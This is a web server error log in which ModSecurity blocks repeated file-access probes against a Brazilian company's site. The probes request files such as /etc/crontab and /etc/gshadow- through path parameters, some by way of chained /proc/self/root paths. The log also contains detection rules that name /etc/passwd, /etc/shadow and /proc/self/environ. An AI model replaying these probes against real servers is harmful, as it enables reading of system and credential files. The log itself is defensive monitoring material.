[Fri Mar 20 11:12:26.491232 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:33492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1VyuoXxyEfFpUF8f-qHQAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:12:30.359794 2026] [:error] [pid 9818:tid 140411658000128] [client 216.73.216.191:49720] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1Vzl1pVZ5mVmJwsFNY0AAAAEo"]
[Fri Mar 20 11:12:31.699710 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.241.31:58494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Vz_qxLDW4GITHUkQT2AAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:12:33.233034 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:58510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1V0fXLqtnMIWvjpaLFZQAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:12:35.229787 2026] [mime_magic:error] [pid 11642:tid 140411674785536] (70014)End of file found: [client 57.141.18.74:50006] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:12:38.151494 2026] [:error] [pid 21219:tid 140411641214720] [client 216.73.216.191:50182] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1V1vXLqtnMIWvjpaLFagAAAow"]
[Fri Mar 20 11:12:40.281691 2026] [mime_magic:error] [pid 9818:tid 140411725141760] (70014)End of file found: [client 57.141.18.9:50288] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:12:47.410326 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.11:50692] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1V3-oXxyEfFpUF8f-qMgAAAVM"]
[Fri Mar 20 11:12:56.375546 2026] [:error] [pid 7893:tid 140411708356352] [client 216.73.216.191:50938] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1V6BCii7xarUs8iHaUiQAAAgQ"]
[Fri Mar 20 11:12:59.898297 2026] [:error] [pid 7893:tid 140411582465792] [client 216.73.216.191:51364] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1V6xCii7xarUs8iHaUjAAAAhM"]
[Fri Mar 20 11:13:01.125780 2026] [mime_magic:error] [pid 9818:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:51510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:13:01.667373 2026] [:error] [pid 10189:tid 140411641214720] [client 216.73.216.191:51538] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1V7TJ3M9BSuKP7CAZPmQAAAIw"]
[Fri Mar 20 11:13:03.163631 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:58516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1V79a6ubjKNq_cu4YD-QAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:13:04.263844 2026] [mime_magic:error] [pid 26799:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:51680] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:13:04.415096 2026] [:error] [pid 7235:tid 140411616036608] [client 216.73.216.191:51676] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1V8PqxLDW4GITHUkQUEgAAAQ8"]
[Fri Mar 20 11:13:05.037796 2026] [mime_magic:error] [pid 31215:tid 140411624429312] (70014)End of file found: [client 57.141.18.66:51792] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:13:09.762215 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.0:52066] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1V9TJ3M9BSuKP7CAZPpwAAAJY"]
[Fri Mar 20 11:13:18.874405 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:55040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1V_vqxLDW4GITHUkQUKQAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:13:21.321594 2026] [mime_magic:error] [pid 31215:tid 140411691570944] (70014)End of file found: [client 57.141.18.45:52764] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:13:28.035052 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.40:53076] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1WCDJ3M9BSuKP7CAZPvgAAAIQ"]
[Fri Mar 20 11:13:29.697644 2026] [:error] [pid 7893:tid 140411548894976] [client 216.73.216.191:53204] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WCRCii7xarUs8iHaUqQAAAhc"]
[Fri Mar 20 11:13:30.078199 2026] [:error] [pid 11642:tid 140411565680384] [client 57.141.18.98:53234] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1WCrninkcc-iUj5AqHAgAAA5U"]
[Fri Mar 20 11:13:33.015522 2026] [:error] [pid 11642:tid 140411658000128] [client 216.73.216.191:53380] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WDbninkcc-iUj5AqHBgAAA4o"]
[Fri Mar 20 11:13:41.136576 2026] [:error] [pid 7235:tid 140411649607424] [client 57.141.18.64:53848] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1WEvqxLDW4GITHUkQUPQAAAQs"]
[Fri Mar 20 11:13:41.164700 2026] [:error] [pid 11167:tid 140411574073088] [client 216.73.216.191:53866] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1WFPHIg5MgXLBnicMf6wAAAdQ"]
[Fri Mar 20 11:13:42.059401 2026] [:error] [pid 21219:tid 140411540502272] [client 57.141.18.57:53962] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1WFvXLqtnMIWvjpaLFqQAAApg"]
[Fri Mar 20 11:13:43.712742 2026] [:error] [pid 21219:tid 140411641214720] [client 216.73.216.191:54004] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WF_XLqtnMIWvjpaLFqgAAAow"]
[Fri Mar 20 11:13:44.033401 2026] [:error] [pid 31215:tid 140411708356352] [client 216.73.216.191:54054] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WGAF0L0L-SsrnPo6TDgAAAsQ"]
[Fri Mar 20 11:13:47.888775 2026] [:error] [pid 7235:tid 140411699963648] [client 216.73.216.191:54316] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WG_qxLDW4GITHUkQURAAAAQU"]
[Fri Mar 20 11:13:48.907422 2026] [:error] [pid 26799:tid 140411607643904] [client 57.141.18.0:54398] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1WHNa6ubjKNq_cu4YENgAAA1A"]
[Fri Mar 20 11:13:49.999411 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.13:54470] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1WHfXLqtnMIWvjpaLFrwAAAo0"]
[Fri Mar 20 11:13:50.591658 2026] [:error] [pid 26799:tid 140411649607424] [client 216.73.216.191:54504] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1WHta6ubjKNq_cu4YEPQAAA0s"]
